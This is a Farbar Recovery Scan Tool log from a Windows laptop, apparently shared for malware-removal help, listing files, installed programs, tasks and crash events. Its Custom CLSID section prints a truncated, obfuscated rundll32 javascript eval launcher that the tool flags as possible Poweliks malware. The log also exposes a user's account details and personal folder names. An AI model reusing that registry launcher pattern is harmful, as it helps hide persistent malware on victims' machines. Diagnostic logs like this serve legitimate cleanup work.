00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories 2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Windows Defender 2014-12-01 09:17 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Defender 2014-12-01 09:17 - 2012-07-26 00:52 - 00000000 ____D () C:\Program Files\Windows Journal 2014-12-01 09:14 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files\Windows Photo Viewer 2014-12-01 09:14 - 2012-07-26 01:12 - 00000000 ____D () C:\Program Files (x86)\Windows Photo Viewer 2014-12-01 09:14 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\SysWOW64\Dism 2014-12-01 09:14 - 2012-07-25 22:38 - 00000000 ____D () C:\Windows\system32\Dism 2014-12-01 09:00 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\sru 2014-12-01 08:57 - 2012-07-26 00:59 - 00000000 ____D () C:\Windows\CbsTemp 2014-12-01 08:56 - 2013-01-24 23:13 - 00003598 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2762839642-1568754923-376086736-1001 2014-12-01 08:25 - 2013-01-25 10:20 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\vlc 2014-12-01 07:52 - 2012-07-26 01:12 - 00000000 ____D () C:\Windows\system32\NDF 2014-12-01 07:51 - 2012-11-21 00:19 - 00002739 _____ () C:\Windows\system32\RaCoInst.log 2014-12-01 07:28 - 2013-01-25 00:49 - 00000000 ____D () C:\Users\johnsmith\Desktop\giganews 2014-12-01 07:19 - 2013-01-31 21:49 - 00000000 ____D () C:\Users\johnsmith\AppData\Local\CrashDumps 2014-11-30 20:33 - 2012-09-12 18:50 - 00000000 ____D () C:\Windows\en 2014-11-30 19:46 - 2012-07-25 22:26 - 00008192 ___SH () C:\Windows\system32\config\BBI 2014-11-30 19:35 - 2014-04-29 05:42 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Binreader 2014-11-30 18:43 - 2014-09-24 20:10 - 00000000 ____D () C:\Users\johnsmith\Desktop\House Ideas 2014-11-29 09:58 - 2014-08-29 23:18 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\tixati 2014-11-25 16:39 - 2014-05-08 13:10 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2014-11-25 01:39 - 2014-06-08 18:36 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\Youtube Downloader HD 2014-11-25 01:38 - 2014-06-08 18:23 - 00001153 _____ () C:\Users\johnsmith\Desktop\Youtube Downloader HD.lnk 2014-11-25 01:38 - 2014-06-08 18:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Youtube Downloader HD 2014-11-25 01:38 - 2014-06-08 18:23 - 00000000 ____D () C:\Program Files (x86)\Youtube Downloader HD 2014-11-24 09:27 - 2013-01-25 11:22 - 00000000 ____D () C:\Users\johnsmith\Documents\Calibre Library 2014-11-23 08:56 - 2014-02-10 11:26 - 00000000 ____D () C:\Users\johnsmith\Desktop\books to load 2014-11-20 09:59 - 2013-02-15 21:16 - 00000000 ____D () C:\Users\johnsmith\AppData\Local\QuickPar 2014-11-19 14:35 - 2013-01-29 23:17 - 00001891 _____ () C:\Users\johnsmith\Desktop\Mirc searches.txt 2014-11-19 14:20 - 2013-01-24 23:03 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\mIRC 2014-11-19 14:13 - 2013-02-14 23:18 - 00000000 ____D () C:\Users\johnsmith\Documents\My Kindle Content 2014-11-19 13:39 - 2014-10-10 20:59 - 00000273 _____ () C:\Users\johnsmith\Desktop\Monthly Finances.txt 2014-11-14 15:30 - 2014-05-08 13:10 - 00003900 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-11-14 15:30 - 2014-05-08 13:10 - 00003664 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-11-13 18:16 - 2013-01-27 22:53 - 00001701 _____ () C:\Users\johnsmith\Desktop\IMDB.url 2014-11-11 04:53 - 2014-07-01 15:43 - 00000000 ____D () C:\Users\johnsmith\Desktop\Nicole's New Job Search 2014-11-09 09:23 - 2014-04-29 09:48 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\HandBrake 2014-11-07 10:05 - 2013-09-06 09:47 - 00000000 ____D () C:\Windows\Minidump 2014-11-06 11:33 - 2013-01-24 21:18 - 00000000 ____D () C:\Users\johnsmith Some content of TEMP: ==================== C:\Users\johnsmith\AppData\Local\Temp\syserrfix.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-11-23 23:14 ==================== End Of Log ============================ Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-11-2014 01 Ran by johnsmith at 2014-11-30 21:08:19 Running from C:\Users\johnsmith\Desktop Boot Mode: Normal ========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 4 Elements II (x32 Version: 2.2.0.98 - WildTangent) Hidden Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated) Adobe Reader XI (11.0.01) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.01 - Adobe Systems Incorporated) Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.5.635 - Adobe Systems, Inc.) Amazon Kindle (HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Amazon Kindle) (Version: - Amazon) ArcSoft Panorama Maker 6 (HKLM-x32\...\{E9CBC8FA-BF1F-4956-8B75-0D314682FE5F}) (Version: 6.0.0.92 - ArcSoft) AuthenTec TrueAPI 64-bit (Version: 1.6.0.86 - AuthenTec, Inc.) Hidden Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden Binreader (HKLM-x32\...\{3D47B2C0-8748-4450-99AE-0746A5A74C8E}) (Version: 1.0.0 - Binreader) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) Build-a-lot 4 - Power Source (x32 Version: 2.2.0.98 - WildTangent) Hidden calibre 64bit (HKLM\...\{0F072A3A-7D6F-4CE0-AB44-10DB3A7B3852}) (Version: 1.17.0 - Kovid Goyal) Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden Classic Shell (HKLM\...\{CB00799C-0E4F-4FD1-A046-BD24321BCDFF}) (Version: 3.6.5 - IvoSoft) Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1.5407 - CyberLink Corp.) CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.) CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{4862344A-A39C-4897-ACD4-A1BED5163C5A}) (Version: 2.0.1.3119 - CyberLink Corp.) CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.1.1926 - CyberLink Corp.) CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.1.1925 - CyberLink Corp.) CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.) CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard) Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden FATE: The Cursed King (x32 Version: 2.2.0.97 - WildTangent) Hidden Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden FlatOut 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden Free Alarm Clock 2.7.1 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 2.7 - Comfort Software Group) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.71 - Google Inc.) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden HandBrake 0.9.9.1 (HKLM-x32\...\HandBrake) (Version: 0.9.9.1 - ) Hard Disk Scrubber 3.4 (Remove Only) (HKLM-x32\...\{DE47ADD1-B82B-4B52-AF29-76AE7EF4E19D}_is1) (Version: - Summit Computer Networks, Inc.) HDR Efex Pro 2 (HKLM-x32\...\HDR Efex Pro 2) (Version: 2.0.0.0 - Nik Software, Inc.) Hewlett-Packard ACLM.NET v1.2.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden HP 3D DriveGuard (HKLM\...\{F244D07D-1876-4CDD-914D-214E15A8D327}) (Version: 4.2.5.1 - Hewlett-Packard Company) HP Connected Backup (HKLM-x32\...\{6BA5F6E7-6CC1-4117-816D-A549A06CE44E}) (Version: 8.7.0.0 - Autonomy) HP Connected Music (Meridian - installer) (HKLM-x32\...\StartHPConnectedMusic) (Version: v1.0 - Meridian Audio Ltd) HP CoolSense (HKLM-x32\...\{16B7BDA1-B967-4D2D-8B27-E12727C28350}) (Version: 2.10.3 - Hewlett-Packard Company) HP Documentation (HKLM-x32\...\{0EF47DBD-7E67-492F-9423-DAF028BEF627}) (Version: 1.1.0.0 - Hewlett-Packard) HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.3.0 - WildTangent) HP MyRoom (HKLM-x32\...\{9C35EDE5-4B0F-45E7-A438-314BA889948E}) (Version: 9.0.0.0 - Hewlett-Packard Company) HP Quick Launch (HKLM-x32\...\{609B11CC-8CED-4116-AD8A-A72168894D39}) (Version: 3.0.4 - Hewlett-Packard Company) HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard) HP SimplePass (HKLM-x32\...\{34C821CA-6B55-44A0-8A9B-2EF471D6019E}) (Version: 6.0.100.244 - Hewlett-Packard) HP Software Framework (HKLM-x32\...\{835B275B-F29B-464B-BD4B-097FD55FAB0A}) (Version: 4.6.8.1 - Hewlett-Packard Company) HP Support Assistant (HKLM-x32\...\{B8019B54-F9BE-490A-9619-6D06F18F129F}) (Version: 7.0.32.44 - Hewlett-Packard Company) HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard) HP Wireless Button Driver (HKLM-x32\...\{941DE69D-6CEE-4171-8F1F-3D7E352AA498}) (Version: 1.0.5.1 - Hewlett-Packard Company) IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6417.0 - IDT) Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2817 - Intel Corporation) Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation) Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden Mahjongg Dimensions Deluxe: Tiles in Time (x32 Version: 2.2.0.98 - WildTangent) Hidden Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation) Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation) Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{4FFA2088-8317-3B14-93CD-4C699DB37843}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) mIRC (HKLM-x32\...\mIRC) (Version: 7.22 - mIRC Co. Ltd.) Mortimer Beckett and the Crimson Thief Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden Nero 12 (HKLM-x32\...\{560FC78C-A4B2-461D-9B47-820C1EEF87B8}) (Version: 12.0.02000 - Nero AG) PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden Perfect Resize 7.0.1 Professional Edition (HKLM-x32\...\{FCADA4FF-142C-42A8-B73C-0A54A7F83345}) (Version: 7.0.1 - onOne Software) Photomatix Pro version 4.2.4 (HKLM\...\PhotomatixPro42x64_is1) (Version: 4.2.4 - HDRsoft Sarl) Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden Prerequisite installer (x32 Version: 12.0.0002 - Nero AG) Hidden Privacy Eraser (HKLM\...\{CB5AC03C-B8AD-980F-998E-51969A6DFC9F}_is1) (Version: 2.8.0.639 - Cybertron Software Co., Ltd.) Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.2.0 - Ralink) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.3.730.2012 - Realtek) Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.27025 - Realtek Semiconductor Corp.) Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden Silver Efex Pro 2 (HKLM-x32\...\Silver Efex Pro 2) (Version: 2.0.0.0 - Nik Software, Inc.) Skype™ 6.16 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.16.105 - Skype Technologies S.A.) swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.10.12 - Synaptics Incorporated) Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden Tixati (HKLM-x32\...\tixati) (Version: - ) TreeSize Free V2.7 (HKLM-x32\...\TreeSize Free_is1) (Version: 2.7 - JAM Software) Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden Vacation Quest™ - Australia (x32 Version: 2.2.0.98 - WildTangent) Hidden Validity WBF DDK (HKLM\...\{1F91C200-8F0F-4009-A75E-DB6CE151BD4E}) (Version: 4.4.234.0 - Validity Sensors, Inc.) VC 9.0 Runtime (x32 Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN) Welcome App (Start-up experience) (x32 Version: 12.0.14000 - Nero AG) Hidden WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent) WildTangent Games App (x32 Version: 4.0.9.6 - WildTangent) Hidden Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation) WinRAR 4.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH) Youtube Downloader HD v. 2.9.9.16.2 (HKLM-x32\...\Youtube Downloader HD_is1) (Version: - YoutubeDownloaderHD.com) Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? ==================== Restore Points ========================= 29-11-2014 19:44:30 Scheduled Checkpoint ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2012-07-25 22:26 - 2012-07-25 22:26 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {44887619-6412-414B-896F-45E47A0080D8} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink) Task: {5EBFA391-93A2-42F0-8C59-966AFE87038F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-08] (Google Inc.) Task: {5ED0D22D-A9B4-4852-A748-30F6CA9CC9C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-08-10] (Hewlett-Packard Company) Task: {727E8D00-4042-4C2E-9218-079ECF9F7AE1} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe [2012-08-24] (Synaptics Incorporated) Task: {72E3FF20-73DF-437C-BF3D-0A8F3877FD7A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-08] (Google Inc.) Task: {8F075D28-AFF0-4171-AED6-C76737CC070C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2012-08-07] (Hewlett-Packard Company) Task: {B3D38C21-AAA2-49A7-956D-33969C76338A} - System32\Tasks\Cybertron\Privacy Eraser\SkipUAC => C:\Program Files\Cybertron\Privacy Eraser\PrivacyEraser.exe [2014-06-16] (Cybertron Software, Co., Ltd.) Task: {DAFF4139-76A3-4C78-8758-708F3D7C2C2D} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink) Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Loaded Modules (whitelisted) ============= 2013-01-25 11:54 - 2011-03-02 10:40 - 00164864 _____ () C:\Program Files\WinRAR\rarext.dll 2012-09-06 02:47 - 2012-09-06 02:47 - 00028160 _____ () C:\Windows\system32\valWBFPolicyService.exe 2012-08-10 02:36 - 2012-08-10 02:36 - 04073320 _____ () C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe 2012-07-28 08:31 - 2012-07-28 08:31 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll 2012-11-21 00:32 - 2012-06-07 20:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll 2012-06-08 12:34 - 2012-06-08 12:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll 2012-11-21 00:15 - 2012-06-25 11:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) AlternateDataStreams: C:\Windows:nlsPreferences ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) HKLM\...\StartupApproved\Run32: => "SwitchBoard" HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\StartupApproved\Run: => "FreeAC" ========================= Accounts: ========================== Administrator (S-1-5-21-2762839642-1568754923-376086736-500 - Administrator - Disabled) Guest (S-1-5-21-2762839642-1568754923-376086736-501 - Limited - Disabled) johnsmith (S-1-5-21-2762839642-1568754923-376086736-1001 - Administrator - Enabled) => C:\Users\johnsmith ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (11/30/2014 09:07:26 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5094a012 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x9e8 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 09:05:22 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a5b9 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x1c54 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 08:35:11 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe, version: 1.2.3.4, time stamp: 0x2a425e19 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x0002076b Faulting process id: 0xafc Faulting application start time: 0x{d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe0 Faulting application path: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe1 Faulting module path: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe2 Report Id: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe3 Faulting package full name: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe4 Faulting package-relative application ID: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe5 Error: (11/30/2014 08:09:43 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x50109de9 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x00061206 Faulting process id: 0x1564 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 08:09:35 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a862 Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a Exception code: 0xc0000005 Fault offset: 0x0002fb1e Faulting process id: 0x510 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Faulting package full name: iexplore.exe4 Faulting package-relative application ID: iexplore.exe5 Error: (11/30/2014 07:49:08 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: powershell.exe, version: 6.2.9200.16384, time stamp: 0x50109cce Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x034731a0 Faulting process id: 0xd70 Faulting application start time: 0xpowershell.exe0 Faulting application path: powershell.exe1 Faulting module path: powershell.exe2 Report Id: powershell.exe3 Faulting package full name: powershell.exe4 Faulting package-relative application ID: powershell.exe5 Error: (11/30/2014 07:49:02 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Application: powershell.exe Framework Version: v4.0.30319 Description: The process was terminated due to an unhandled exception. Exception Info: System.AccessViolationException Stack: at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32) at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32) at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, 